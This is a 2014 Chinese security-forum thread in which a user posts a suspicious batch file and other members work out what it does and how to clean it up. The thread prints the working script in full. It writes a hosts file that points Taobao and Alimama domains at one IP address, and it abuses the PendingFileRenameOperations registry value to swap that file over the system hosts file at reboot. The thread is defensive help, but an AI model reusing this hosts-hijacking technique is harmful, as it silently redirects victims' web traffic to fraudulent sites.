收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 软件区 解疑答难区 一个可疑的批处理文件
返回列表 发新帖
查看: 1738|回复: 9
收起左侧

[已解决] 一个可疑的批处理文件

 关闭 [复制链接]
like2014
发表于 2014-4-11 10:48:39 | 显示全部楼层 |阅读模式
本帖最后由 like2014 于 2014-4-14 08:02 编辑

突然发现一个可疑的批处理文件,内容如下:
@echo off
:ks
if exist "c:\Documents and Settings\FIS.txt" goto del1
echo 113.10.166.228 tmatch.simba.taobao.com 113.10.166.228 xmatch.simba.taobao.com 113.10.166.228 itam.taobao.com 113.10.166.228 a.alimama.cn>"c:\Documents and Settings\FIS.txt"
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager" /v PendingFileRenameOperations /t REG_MULTI_SZ /d "\??\c:\Documents and Settings\FIS.txt"\0"!\??\C:\WINDOWS\system32\drivers\etc\hosts" /f>nul
del %0

:del1
del %0

另外发现 hosts 里只有这些内容:
113.10.166.228 tmatch.simba.taobao.com 113.10.166.228 xmatch.simba.taobao.com 113.10.166.228 itam.taobao.com 113.10.166.228 a.alimama.cn

请教各位朋友,我是不是中招了?危害大吗?直接删除那个文件是不是就可以解决?
回复

举报

随便注册
发表于 2014-4-11 11:14:58 | 显示全部楼层
建立一个c:\Documents and Settings\FIS.txt,内容是那几个IP和域名

下次重启时用来替换C:\WINDOWS\system32\drivers\etc\hosts

然后你原来的host就没了

可能是为了绕过保护host的杀软吧
回复

举报

jalonekf
发表于 2014-4-11 12:42:23 | 显示全部楼层
批处理是什么的语言做的。?
回复

举报

peng85344558
发表于 2014-4-11 12:53:40 | 显示全部楼层
直接删除批处理文件后  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager这个表值 对照下其他电脑是怎么设置的 对应设置下
C:\WINDOWS\system32\drivers\etc\hosts 这个简单 记事本形式打开  里面的内容可以全部删掉
这个文件是把淘宝搜索的页面跳转到他的站点 从而坑人的
最好还是杀毒下 批处理还算很明显

评分

参与人数 1经验 +7 收起 理由
woxihuan2011 + 7 感谢解答: )

查看全部评分

回复

举报

like2014
 楼主| 发表于 2014-4-11 16:25:29 | 显示全部楼层
peng85344558 发表于 2014-4-11 12:53
直接删除批处理文件后  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager这个表值 对 ...

注册表好像没啥问题吧,看不太明白
批处理已经删除,hosts也已经清空啦
可惜,用QQ管家与金山毒霸都没查出问题来

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

peng85344558
发表于 2014-4-11 17:00:15 | 显示全部楼层
like2014 发表于 2014-4-11 16:25
注册表好像没啥问题吧,看不太明白
批处理已经删除,hosts也已经清空啦
可惜,用QQ管家与金山毒霸都没 ...

留意那个批处理 在电脑重启后是否再生 再生就麻烦了
@100lj  帮手对比下HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager 键值是否差不多  我的系统没比对性
回复

举报

蓝色天气
发表于 2014-4-11 17:12:48 | 显示全部楼层
peng85344558 发表于 2014-4-11 17:00
留意那个批处理 在电脑重启后是否再生 再生就麻烦了
@100lj  帮手对比下HKEY_LOCAL_MACHINE\SYSTEM\Curr ...


win7 64的。老朋好些天没出现了,回来就好

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
peng85344558 + 1 前阵子出差去无网络区 然后又是换岗组团招.

查看全部评分

回复

举报

100lj
发表于 2014-4-11 18:48:14 | 显示全部楼层
本帖最后由 100lj 于 2014-4-11 18:51 编辑
peng85344558 发表于 2014-4-11 17:00
留意那个批处理 在电脑重启后是否再生 再生就麻烦了
@100lj  帮手对比下HKEY_LOCAL_MACHINE\SYSTEM\Curr ...



我是XP的,好像与楼主的不完全一样。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

peng85344558
发表于 2014-4-12 12:50:42 | 显示全部楼层
like2014 发表于 2014-4-11 16:25
注册表好像没啥问题吧,看不太明白
批处理已经删除,hosts也已经清空啦
可惜,用QQ管家与金山毒霸都没 ...

pendingfilenameoperations 那个键值记录下  然后删除掉  
那个是重命名功能的键 有风险

评分

参与人数 1经验 +4 收起 理由
woxihuan2011 + 4 感谢解答: )

查看全部评分

回复

举报

like2014
 楼主| 发表于 2014-4-14 08:02:33 | 显示全部楼层
peng85344558 发表于 2014-4-12 12:50
pendingfilenameoperations 那个键值记录下  然后删除掉  
那个是重命名功能的键 有风险

好的,谢谢朋友
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-20 07:53 , Processed in 0.135683 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表